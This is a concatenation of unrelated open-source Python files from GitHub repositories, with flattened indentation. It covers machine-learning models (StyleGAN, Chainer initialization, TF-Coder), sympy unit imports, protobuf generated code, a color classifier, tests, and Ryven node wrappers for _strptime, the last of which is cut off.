def init_like_torch(link):
# Mimic torch's default parameter initialization
# TODO(muupan): Use chainer's initializers when it is merged
for li in link.links():
if isinstance(li, L.Linear):
out_channels, in_channels = li.W.shape
stdv = 1 / np.sqrt(in_channels)
li.W.array[:] = np.random.uniform(-stdv, stdv, size=li.W.shape)
if li.b is not None:
li.b.array[:] = np.random.uniform(-stdv, stdv, size=li.b.shape)
elif isinstance(li, L.Convolution2D):
out_channels, in_channels, kh, kw = li.W.shape
stdv = 1 / np.sqrt(in_channels * kh * kw)
li.W.array[:] = np.random.uniform(-stdv, stdv, size=li.W.shape)
if li.b is not None:
li.b.array[:] = np.random.uniform(-stdv, stdv, size=li.b.shape)
|
sympy/physics/units/definitions/__init__.py | giorgosgiapis/sympy | 445 | 12716890 | from .unit_definitions import (
percent, percents,
permille,
rad, radian, radians,
deg, degree, degrees,
sr, steradian, steradians,
mil, angular_mil, angular_mils,
m, meter, meters,
kg, kilogram, kilograms,
s, second, seconds,
A, ampere, amperes,
K, kelvin, kelvins,
mol, mole, moles,
cd, candela, candelas,
g, gram, grams,
mg, milligram, milligrams,
ug, microgram, micrograms,
newton, newtons, N,
joule, joules, J,
watt, watts, W,
pascal, pascals, Pa, pa,
hertz, hz, Hz,
coulomb, coulombs, C,
volt, volts, v, V,
ohm, ohms,
siemens, S, mho, mhos,
farad, farads, F,
henry, henrys, H,
tesla, teslas, T,
weber, webers, Wb, wb,
optical_power, dioptre, D,
lux, lx,
katal, kat,
gray, Gy,
becquerel, Bq,
km, kilometer, kilometers,
dm, decimeter, decimeters,
cm, centimeter, centimeters,
mm, millimeter, millimeters,
um, micrometer, micrometers, micron, microns,
nm, nanometer, nanometers,
pm, picometer, picometers,
ft, foot, feet,
inch, inches,
yd, yard, yards,
mi, mile, miles,
nmi, nautical_mile, nautical_miles,
l, liter, liters,
dl, deciliter, deciliters,
cl, centiliter, centiliters,
ml, milliliter, milliliters,
ms, millisecond, milliseconds,
us, microsecond, microseconds,
ns, nanosecond, nanoseconds,
ps, picosecond, picoseconds,
minute, minutes,
h, hour, hours,
day, days,
anomalistic_year, anomalistic_years,
sidereal_year, sidereal_years,
tropical_year, tropical_years,
common_year, common_years,
julian_year, julian_years,
draconic_year, draconic_years,
gaussian_year, gaussian_years,
full_moon_cycle, full_moon_cycles,
year, years, tropical_year,
G, gravitational_constant,
c, speed_of_light,
elementary_charge,
Z0,
hbar,
planck,
eV, electronvolt, electronvolts,
avogadro_number,
avogadro, avogadro_constant,
boltzmann, boltzmann_constant,
stefan, stefan_boltzmann_constant,
R, molar_gas_constant,
faraday_constant,
josephson_constant,
von_klitzing_constant,
amu, amus, atomic_mass_unit, atomic_mass_constant,
gee, gees, acceleration_due_to_gravity,
u0, magnetic_constant, vacuum_permeability,
e0, electric_constant, vacuum_permittivity,
Z0, vacuum_impedance,
coulomb_constant, coulombs_constant, electric_force_constant,
atmosphere, atmospheres, atm,
kPa, kilopascal,
bar, bars,
pound, pounds,
psi,
dHg0,
mmHg, torr,
mmu, mmus, milli_mass_unit,
quart, quarts,
ly, lightyear, lightyears,
au, astronomical_unit, astronomical_units,
planck_mass,
planck_time,
planck_temperature,
planck_length,
planck_charge,
planck_area,
planck_volume,
planck_momentum,
planck_energy,
planck_force,
planck_power,
planck_density,
planck_energy_density,
planck_intensity,
planck_angular_frequency,
planck_pressure,
planck_current,
planck_voltage,
planck_impedance,
planck_acceleration,
bit, bits,
byte,
kibibyte, kibibytes,
mebibyte, mebibytes,
gibibyte, gibibytes,
tebibyte, tebibytes,
pebibyte, pebibytes,
exbibyte, exbibytes,
curie, rutherford
)
|
app/src/main/python/package1/package12/python.py | Tanita2529/chaquopy | 336 | 12716896 | x = "python 12"
|
tf_coder/tf_coder_main.py | hstrohm/PyTorch-Coder-cheat | 245 | 12716902 | <reponame>hstrohm/PyTorch-Coder-cheat
# Copyright 2021 The TF-Coder Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""A script for using TF-Coder (an alternative to using the Colab notebook).
Usage:
1. Edit `get_problem()` to specify your problem.
2. If desired, edit `get_settings()` to specify settings for TF-Coder.
3. Run this file, e.g., `python3 tf_coder_main.py`.
"""
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Must happen before importing tf.
os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # CPU is faster than GPU.
from absl import app # pylint: disable=g-import-not-at-top
import numpy as np # pylint: disable=unused-import
import tensorflow as tf # pylint: disable=unused-import
from tf_coder.value_search import colab_interface
from tf_coder.value_search import value_search_settings as settings_module
def get_problem():
"""Specifies a problem to run TF-Coder on. Edit this function!"""
# A dict mapping input variable names to input tensors.
inputs = {
'rows': [10, 20, 30],
'cols': [1, 2, 3, 4],
}
# The single desired output tensor.
output = [[11, 12, 13, 14],
[21, 22, 23, 24],
[31, 32, 33, 34]]
# A list of relevant scalar constants (if any).
constants = []
# An English description of the tensor manipulation.
description = 'add two vectors with broadcasting to get a matrix'
return inputs, output, constants, description
def get_settings():
"""Specifies settings for TF-Coder. Edit this function!"""
# How long to search for a solution, in seconds.
time_limit = 300
# How many solutions to find before stopping. If more than 1, the entire
# search will slow down.
number_of_solutions = 1
# Whether solutions must use all inputs, at least one input, or no such
# requirement. Choose one of "all inputs", "one input", "no restriction".
solution_requirement = 'all inputs'
assert solution_requirement in ['all inputs', 'one input', 'no restriction']
return settings_module.from_dict({
'timeout': time_limit,
'only_minimal_solutions': False,
'max_solutions': number_of_solutions,
'require_all_inputs_used': solution_requirement == 'all inputs',
'require_one_input_used': solution_requirement == 'one input',
})
def run_tf_coder(inputs, output, constants, description, settings):
"""Runs TF-Coder on a problem, using the given settings."""
# Results will be printed to standard output.
colab_interface.run_value_search_from_colab(
inputs, output, constants, description, settings)
def print_supported_operations():
"""Run this function to print all supported operations."""
colab_interface.print_supported_operations()
def main(unused_argv):
# It takes several seconds to load the models.
colab_interface.warm_up()
inputs, output, constants, description = get_problem()
settings = get_settings()
run_tf_coder(inputs, output, constants, description, settings)
if __name__ == '__main__':
app.run(main)
|
caql/gaussian_noise_policy_test.py | deepneuralmachine/google-research | 23,901 | 12716932 | <reponame>deepneuralmachine/google-research<filename>caql/gaussian_noise_policy_test.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for gaussian_noise_policy."""
from unittest import mock
from absl import logging
import numpy as np
import tensorflow as tf
from tf_agents.specs import array_spec
from caql import agent_policy
from caql import gaussian_noise_policy
class GaussianNoisePolicyTest(tf.test.TestCase):
def setUp(self):
super(GaussianNoisePolicyTest, self).setUp()
seed = 199
logging.info('Setting the numpy seed to %d', seed)
np.random.seed(seed)
self._mock_policy = mock.create_autospec(
agent_policy.AgentPolicy, instance=True)
self._mock_policy.continuous_action = True
self._mock_policy.action_spec = array_spec.BoundedArraySpec(
shape=(3,), dtype=np.float, minimum=[0, 0, 0], maximum=[1, 1, 1])
def testNoneAction(self):
self._mock_policy.action.return_value = None
policy = gaussian_noise_policy.GaussianNoisePolicy(
self._mock_policy, 0.9, 0.7, 0.01)
self.assertIsNone(policy.action(np.arange(2)))
def testGaussianNoiseAction(self):
self._mock_policy.action.return_value = np.array([0.2, 0.5, 0.8])
policy = gaussian_noise_policy.GaussianNoisePolicy(
self._mock_policy, 0.9, 0.1, 0.01)
action = policy.action(np.arange(2))
policy.update_params()
self.assertAllClose([1.19726433, 0.20994996, 2.85986947], action)
action = policy.action(np.arange(2))
policy.update_params()
self.assertAllClose([0.03390958, 0.36193276, 0.89809503], action)
action = policy.action(np.arange(2))
policy.update_params()
self.assertAllClose([0.21209471, 0.49707365, 0.79036936], action)
def testSigmaDecay(self):
sigma = 0.9
decay_rate = 0.7
sigma_min = 0.01
policy = gaussian_noise_policy.GaussianNoisePolicy(
self._mock_policy, sigma, decay_rate, sigma_min)
for _ in range(20):
policy.update_params()
sigma = max(sigma * decay_rate, sigma_min)
self.assertAlmostEqual(sigma, policy.sigma)
if __name__ == '__main__':
tf.test.main()
|
silk/__init__.py | eduzen/django-silk | 2,027 | 12716959 | import django
from pkg_resources import DistributionNotFound, get_distribution
try:
__version__ = get_distribution("django-silk").version
except DistributionNotFound:
pass
if django.VERSION < (3, 2):
default_app_config = "silk.apps.SilkAppConfig"
|
onnxmltools/convert/coreml/operator_converters/neural_network/Concat.py | xhochy/onnxmltools | 623 | 12716980 | <gh_stars>100-1000
# SPDX-License-Identifier: Apache-2.0
from ....common._apply_operation import apply_concat
from ....common._registration import register_converter
def convert_concat(scope, operator, container):
if operator.raw_operator.concat.sequenceConcat:
axis = 0
else:
axis = 1
apply_concat(scope, operator.input_full_names, operator.output_full_names, container,
operator_name=operator.full_name, axis=axis)
register_converter('concat', convert_concat)
|
coloranalytics.py | lihao2333/cubr | 300 | 12717036 | # coloranalytics.py
# <NAME>
# CMU S13 15-112 Term Project
from math import e
class Profile(object):
def __init__(self, color, meanSat, meanHue, meanVal, meanSqSat, meanSqHue, meanSqVal):
self.color = color
self.meanSat = meanSat
self.meanHue = meanHue
self.meanVal = meanVal
self.meanSqSat = meanSqSat
self.meanSqHue = meanSqHue
self.meanSqVal = meanSqVal
def probability(self, h, s, v, hOff):
h -= hOff
hWeight = float(self.meanSqSat) / (max(self.meanSqHue, 1))
vWeight = float(self.meanSqVal) / (max(self.meanSqVal, 1))
sWeight = 1.
weightSum = hWeight + sWeight + vWeight
hWeight = hWeight / weightSum
sWeight = sWeight / weightSum
vWeight = vWeight / weightSum
hWeight = 1.
sWeight = vWeight = 0.
devsH = ((h - self.meanHue) ** 2) / max(1., self.meanSqHue)
devsS = ((s - self.meanSat) ** 2) / max(1., self.meanSqSat)
devsV = ((v - self.meanVal) ** 2) / max(1., self.meanSqVal)
prob = 0
prob += hWeight * (e ** (-abs(devsH)))
prob += sWeight * (e ** (-abs(devsS)))
prob += vWeight * (e ** (-abs(devsV)))
return prob
class Profiles(object):
def __init__(self):
with open('coloranalytics.txt') as file:
data = eval(file.read())
self.colorProfiles = [ ]
self.hueOffset = 0
self.rgbOffset = (0,0,0)
for color in data:
profile = [ ]
profile.append(color)
sats = [i[0] for i in data[color]]
hues = [i[1] for i in data[color]]
vals = [i[2] for i in data[color]]
meanSat = float(sum(sats)) / len(sats)
meanHue = float(sum(hues)) / len(hues)
meanVal = float(sum(vals)) / len(vals)
sqsSat = [(sat - meanSat)**2 for sat in sats]
meanSqSat = float(sum(sqsSat)) / len(sqsSat)
sqsHue = [(hue - meanHue)**2 for hue in hues]
meanSqHue = float(sum(sqsHue)) / len(sqsHue)
sqsVal = [(val - meanVal)**2 for val in vals]
meanSqVal = float(sum(sqsVal)) / len(sqsVal)
self.colorProfiles.append(Profile(color, meanSat, meanHue, meanVal,
meanSqSat, meanSqHue, meanSqVal))
def getColor(self, h, s, v):
maxProb = -1
maxProfile = None
for profile in self.colorProfiles:
prob = profile.probability(h,s,v, self.hueOffset)
if prob > maxProb:
maxProfile = profile
maxProb = prob
return maxProfile.color
def colorByHSV(hue, sat, val):
# this is an optional feature not used in this release.
return profiles.getColor(hue, sat, val)
def colorByRGB(*args):
if len(args) == 4:
(rgb, h, s, v) = args
elif len(args) == 2:
(rgb, hsv) = args
(h, s, v) = hsv
(blue, green, red) = rgb
(blueOff, greenOff, redOff) = profiles.rgbOffset
red += redOff
green += greenOff
blue += blueOff
green = float(max(green, 1))
red = float(max(red, 1))
blue = float(max(blue, 1))
if blue / red > 2 and blue / green > 2:
return 'blue'
elif green / red > 2:
return 'green'
if h > 150 or h < 6:
return 'red'
elif h < 20 and s < 150:
return 'white'
elif h < 20:
return 'orange'
elif h < 50:
return 'yellow'
return 'white'
profiles = Profiles()
def updateWhite(rgb):
(red, green, blue) = rgb
avg = (red + green + blue) / 3
profiles.rgbOffset = (avg - red, avg - green, avg - blue) |
apis/models/base.py | IndraP24/katana | 102 | 12717058 | from pydantic import BaseModel
class TrainingStatusResponse(BaseModel):
trainingId: str = "056b5d3d-f983-4cd3-8fbd-20b8dad24e0f"
status: str = "Training queued"
|
services/internal/protocol/lobby_custom_pb2.py | yanxianhe/go-xserver | 160 | 12717060 | <gh_stars>100-1000
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: lobby_custom.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='lobby_custom.proto',
package='protocol',
syntax='proto3',
serialized_pb=_b('\n\x12lobby_custom.proto\x12\x08protocol\"2\n\x0eROLE_BASE_INFO\x12\x0e\n\x06RoleID\x18\x01 \x01(\x04\x12\x10\n\x08RoleName\x18\x02 \x01(\t\">\n\x10ROLE_DETAIL_INFO\x12*\n\x08\x42\x61seInfo\x18\x01 \x01(\x0b\x32\x18.protocol.ROLE_BASE_INFOb\x06proto3')
)
_ROLE_BASE_INFO = _descriptor.Descriptor(
name='ROLE_BASE_INFO',
full_name='protocol.ROLE_BASE_INFO',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='RoleID', full_name='protocol.ROLE_BASE_INFO.RoleID', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='RoleName', full_name='protocol.ROLE_BASE_INFO.RoleName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=32,
serialized_end=82,
)
_ROLE_DETAIL_INFO = _descriptor.Descriptor(
name='ROLE_DETAIL_INFO',
full_name='protocol.ROLE_DETAIL_INFO',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='BaseInfo', full_name='protocol.ROLE_DETAIL_INFO.BaseInfo', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=84,
serialized_end=146,
)
_ROLE_DETAIL_INFO.fields_by_name['BaseInfo'].message_type = _ROLE_BASE_INFO
DESCRIPTOR.message_types_by_name['ROLE_BASE_INFO'] = _ROLE_BASE_INFO
DESCRIPTOR.message_types_by_name['ROLE_DETAIL_INFO'] = _ROLE_DETAIL_INFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ROLE_BASE_INFO = _reflection.GeneratedProtocolMessageType('ROLE_BASE_INFO', (_message.Message,), dict(
DESCRIPTOR = _ROLE_BASE_INFO,
__module__ = 'lobby_custom_pb2'
# @@protoc_insertion_point(class_scope:protocol.ROLE_BASE_INFO)
))
_sym_db.RegisterMessage(ROLE_BASE_INFO)
ROLE_DETAIL_INFO = _reflection.GeneratedProtocolMessageType('ROLE_DETAIL_INFO', (_message.Message,), dict(
DESCRIPTOR = _ROLE_DETAIL_INFO,
__module__ = 'lobby_custom_pb2'
# @@protoc_insertion_point(class_scope:protocol.ROLE_DETAIL_INFO)
))
_sym_db.RegisterMessage(ROLE_DETAIL_INFO)
# @@protoc_insertion_point(module_scope)
|
src/tests/test_crashing.py | fabm3n/pretix | 1,248 | 12717069 | #
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 <NAME> and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
import os
import pytest
@pytest.mark.skip
def test_crash():
"""
This is a test that crashes with SIGKILL every (n+1)-th time it runs (n = 0, 1, 2, …).
This is useful for debugging our pytest-xdist monkeypatch that we apply in conftest.py
to deal with random test crashes on Travis CI using SQLite. Usually, this test is
skipped to avoid causing additional crashes in real runs.
"""
if os.path.exists('crashed.tmp'):
assert 1
os.remove('crashed.tmp')
else:
with open('crashed.tmp', 'w') as f:
f.write('hi')
os.kill(os.getpid(), 9)
|
ML/Pytorch/GANs/StyleGAN/model.py | shimon-c/Machine-Learning-Collection | 3,094 | 12717072 | <filename>ML/Pytorch/GANs/StyleGAN/model.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from math import log2
factors = [1, 1, 1, 1, 1 / 2, 1 / 4, 1 / 8, 1 / 16, 1 / 32]
class PixelNorm(nn.Module):
def __init__(self):
super(PixelNorm, self).__init__()
self.epsilon = 1e-8
def forward(self, x):
return x / torch.sqrt(torch.mean(x ** 2, dim=1, keepdim=True) + self.epsilon)
class MappingNetwork(nn.Module):
def __init__(self, z_dim, w_dim):
super().__init__()
self.mapping = nn.Sequential(
PixelNorm(),
WSLinear(z_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
)
def forward(self, x):
return self.mapping(x)
class InjectNoise(nn.Module):
def __init__(self, channels):
super().__init__()
self.weight = nn.Parameter(torch.zeros(1, channels, 1, 1))
def forward(self, x):
noise = torch.randn((x.shape[0], 1, x.shape[2], x.shape[3]), device=x.device)
return x + self.weight * noise
class AdaIN(nn.Module):
def __init__(self, channels, w_dim):
super().__init__()
self.instance_norm = nn.InstanceNorm2d(channels)
self.style_scale = WSLinear(w_dim, channels)
self.style_bias = WSLinear(w_dim, channels)
def forward(self, x, w):
x = self.instance_norm(x)
style_scale = self.style_scale(w).unsqueeze(2).unsqueeze(3)
style_bias = self.style_bias(w).unsqueeze(2).unsqueeze(3)
return style_scale * x + style_bias
class WSConv2d(nn.Module):
def __init__(
self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, gain=2,
):
super(WSConv2d, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
self.scale = (gain / (in_channels * (kernel_size ** 2))) ** 0.5
self.bias = self.conv.bias
self.conv.bias = None
# initialize conv layer
nn.init.normal_(self.conv.weight)
nn.init.zeros_(self.bias)
def forward(self, x):
return self.conv(x * self.scale) + self.bias.view(1, self.bias.shape[0], 1, 1)
class WSLinear(nn.Module):
def __init__(
self, in_features, out_features, gain=2,
):
super(WSLinear, self).__init__()
self.linear = nn.Linear(in_features, out_features)
self.scale = (gain / in_features)**0.5
self.bias = self.linear.bias
self.linear.bias = None
# initialize linear layer
nn.init.normal_(self.linear.weight)
nn.init.zeros_(self.bias)
def forward(self, x):
return self.linear(x * self.scale) + self.bias
class GenBlock(nn.Module):
def __init__(self, in_channels, out_channels, w_dim):
super(GenBlock, self).__init__()
self.conv1 = WSConv2d(in_channels, out_channels)
self.conv2 = WSConv2d(out_channels, out_channels)
self.leaky = nn.LeakyReLU(0.2, inplace=True)
self.inject_noise1 = InjectNoise(out_channels)
self.inject_noise2 = InjectNoise(out_channels)
self.adain1 = AdaIN(out_channels, w_dim)
self.adain2 = AdaIN(out_channels, w_dim)
def forward(self, x, w):
x = self.adain1(self.leaky(self.inject_noise1(self.conv1(x))), w)
x = self.adain2(self.leaky(self.inject_noise2(self.conv2(x))), w)
return x
class ConvBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super(ConvBlock, self).__init__()
self.conv1 = WSConv2d(in_channels, out_channels)
self.conv2 = WSConv2d(out_channels, out_channels)
self.leaky = nn.LeakyReLU(0.2)
def forward(self, x):
x = self.leaky(self.conv1(x))
x = self.leaky(self.conv2(x))
return x
class Generator(nn.Module):
def __init__(self, z_dim, w_dim, in_channels, img_channels=3):
super(Generator, self).__init__()
self.starting_constant = nn.Parameter(torch.ones((1, in_channels, 4, 4)))
self.map = MappingNetwork(z_dim, w_dim)
self.initial_adain1 = AdaIN(in_channels, w_dim)
self.initial_adain2 = AdaIN(in_channels, w_dim)
self.initial_noise1 = InjectNoise(in_channels)
self.initial_noise2 = InjectNoise(in_channels)
self.initial_conv = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1)
self.leaky = nn.LeakyReLU(0.2, inplace=True)
self.initial_rgb = WSConv2d(
in_channels, img_channels, kernel_size=1, stride=1, padding=0
)
self.prog_blocks, self.rgb_layers = (
nn.ModuleList([]),
nn.ModuleList([self.initial_rgb]),
)
for i in range(len(factors) - 1): # -1 to prevent index error because of factors[i+1]
conv_in_c = int(in_channels * factors[i])
conv_out_c = int(in_channels * factors[i + 1])
self.prog_blocks.append(GenBlock(conv_in_c, conv_out_c, w_dim))
self.rgb_layers.append(
WSConv2d(conv_out_c, img_channels, kernel_size=1, stride=1, padding=0)
)
def fade_in(self, alpha, upscaled, generated):
# alpha should be scalar within [0, 1], and upscale.shape == generated.shape
return torch.tanh(alpha * generated + (1 - alpha) * upscaled)
def forward(self, noise, alpha, steps):
w = self.map(noise)
x = self.initial_adain1(self.initial_noise1(self.starting_constant), w)
x = self.initial_conv(x)
out = self.initial_adain2(self.leaky(self.initial_noise2(x)), w)
if steps == 0:
return self.initial_rgb(x)
for step in range(steps):
upscaled = F.interpolate(out, scale_factor=2, mode="bilinear")
out = self.prog_blocks[step](upscaled, w)
# The number of channels in upscale will stay the same, while
# out which has moved through prog_blocks might change. To ensure
# we can convert both to rgb we use different rgb_layers
# (steps-1) and steps for upscaled, out respectively
final_upscaled = self.rgb_layers[steps - 1](upscaled)
final_out = self.rgb_layers[steps](out)
return self.fade_in(alpha, final_upscaled, final_out)
class Discriminator(nn.Module):
def __init__(self, in_channels, img_channels=3):
super(Discriminator, self).__init__()
self.prog_blocks, self.rgb_layers = nn.ModuleList([]), nn.ModuleList([])
self.leaky = nn.LeakyReLU(0.2)
# here we work back ways from factors because the discriminator
# should be mirrored from the generator. So the first prog_block and
# rgb layer we append will work for input size 1024x1024, then 512->256-> etc
for i in range(len(factors) - 1, 0, -1):
conv_in = int(in_channels * factors[i])
conv_out = int(in_channels * factors[i - 1])
self.prog_blocks.append(ConvBlock(conv_in, conv_out))
self.rgb_layers.append(
WSConv2d(img_channels, conv_in, kernel_size=1, stride=1, padding=0)
)
# perhaps confusing name "initial_rgb" this is just the RGB layer for 4x4 input size
# did this to "mirror" the generator initial_rgb
self.initial_rgb = WSConv2d(
img_channels, in_channels, kernel_size=1, stride=1, padding=0
)
self.rgb_layers.append(self.initial_rgb)
self.avg_pool = nn.AvgPool2d(
kernel_size=2, stride=2
) # down sampling using avg pool
# this is the block for 4x4 input size
self.final_block = nn.Sequential(
# +1 to in_channels because we concatenate from MiniBatch std
WSConv2d(in_channels + 1, in_channels, kernel_size=3, padding=1),
nn.LeakyReLU(0.2),
WSConv2d(in_channels, in_channels, kernel_size=4, padding=0, stride=1),
nn.LeakyReLU(0.2),
WSConv2d(
in_channels, 1, kernel_size=1, padding=0, stride=1
), # we use this instead of linear layer
)
def fade_in(self, alpha, downscaled, out):
"""Used to fade in downscaled using avg pooling and output from CNN"""
# alpha should be scalar within [0, 1], and upscale.shape == generated.shape
return alpha * out + (1 - alpha) * downscaled
def minibatch_std(self, x):
batch_statistics = (
torch.std(x, dim=0).mean().repeat(x.shape[0], 1, x.shape[2], x.shape[3])
)
# we take the std for each example (across all channels, and pixels) then we repeat it
# for a single channel and concatenate it with the image. In this way the discriminator
# will get information about the variation in the batch/image
return torch.cat([x, batch_statistics], dim=1)
def forward(self, x, alpha, steps):
# where we should start in the list of prog_blocks, maybe a bit confusing but
# the last is for the 4x4. So example let's say steps=1, then we should start
# at the second to last because input_size will be 8x8. If steps==0 we just
# use the final block
cur_step = len(self.prog_blocks) - steps
# convert from rgb as initial step, this will depend on
# the image size (each will have it's on rgb layer)
out = self.leaky(self.rgb_layers[cur_step](x))
if steps == 0: # i.e, image is 4x4
out = self.minibatch_std(out)
return self.final_block(out).view(out.shape[0], -1)
# because prog_blocks might change the channels, for down scale we use rgb_layer
# from previous/smaller size which in our case correlates to +1 in the indexing
downscaled = self.leaky(self.rgb_layers[cur_step + 1](self.avg_pool(x)))
out = self.avg_pool(self.prog_blocks[cur_step](out))
# the fade_in is done first between the downscaled and the input
# this is opposite from the generator
out = self.fade_in(alpha, downscaled, out)
for step in range(cur_step + 1, len(self.prog_blocks)):
out = self.prog_blocks[step](out)
out = self.avg_pool(out)
out = self.minibatch_std(out)
return self.final_block(out).view(out.shape[0], -1)
if __name__ == "__main__":
Z_DIM = 512
W_DIM = 512
IN_CHANNELS = 512
gen = Generator(Z_DIM, W_DIM, IN_CHANNELS, img_channels=3).to("cuda")
disc = Discriminator(IN_CHANNELS, img_channels=3).to("cuda")
tot = 0
for param in gen.parameters():
tot += param.numel()
print(tot)
import sys
sys.exit()
for img_size in [4, 8, 16, 32, 64, 128, 256, 512, 1024]:
num_steps = int(log2(img_size / 4))
x = torch.randn((2, Z_DIM)).to("cuda")
z = gen(x, 0.5, steps=num_steps)
assert z.shape == (2, 3, img_size, img_size)
out = disc(z, alpha=0.5, steps=num_steps)
assert out.shape == (2, 1)
print(f"Success! At img size: {img_size}")
|
Ryven/packages/auto_generated/_strptime/nodes.py | tfroehlich82/Ryven | 2,872 | 12717110 | <reponame>tfroehlich82/Ryven<filename>Ryven/packages/auto_generated/_strptime/nodes.py
from NENV import *
import _strptime
class NodeBase(Node):
pass
class _Calc_Julian_From_U_Or_W_Node(NodeBase):
"""
Calculate the Julian day based on the year, week of the year, and day of
the week, with week_start_day representing whether the week of the year
assumes the week starts on Sunday or Monday (6 or 0)."""
title = '_calc_julian_from_U_or_W'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='year'),
NodeInputBP(label='week_of_year'),
NodeInputBP(label='day_of_week'),
NodeInputBP(label='week_starts_Mon'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._calc_julian_from_U_or_W(self.input(0), self.input(1), self.input(2), self.input(3)))
class _Calc_Julian_From_V_Node(NodeBase):
"""
Calculate the Julian day based on the ISO 8601 year, week, and weekday.
ISO weeks start on Mondays, with week 01 being the week containing 4 Jan.
ISO week days range from 1 (Monday) to 7 (Sunday).
"""
title = '_calc_julian_from_V'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='iso_year'),
NodeInputBP(label='iso_week'),
NodeInputBP(label='iso_weekday'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._calc_julian_from_V(self.input(0), self.input(1), self.input(2)))
class _Getlang_Node(NodeBase):
"""
"""
title = '_getlang'
type_ = '_strptime'
init_inputs = [
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._getlang())
class _Strptime_Node(NodeBase):
"""
Return a 2-tuple consisting of a time struct and an int containing
the number of microseconds based on the input string and the
format string."""
title = '_strptime'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='data_string'),
NodeInputBP(label='format', dtype=dtypes.Data(default='%a %b %d %H:%M:%S %Y', size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._strptime(self.input(0), self.input(1)))
class _Strptime_Datetime_Node(NodeBase):
"""
Return a class cls instance based on the input string and the
format string."""
title = '_strptime_datetime'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='cls'),
NodeInputBP(label='data_string'),
NodeInputBP(label='format', dtype=dtypes.Data(default='%a %b %d %H:%M:%S %Y', size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._strptime_datetime(self.input(0), self.input(1), self.input(2)))
class _Strptime_Time_Node(NodeBase):
"""
Return a time struct based on the input string and the
format string."""
title = '_strptime_time'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='data_string'),
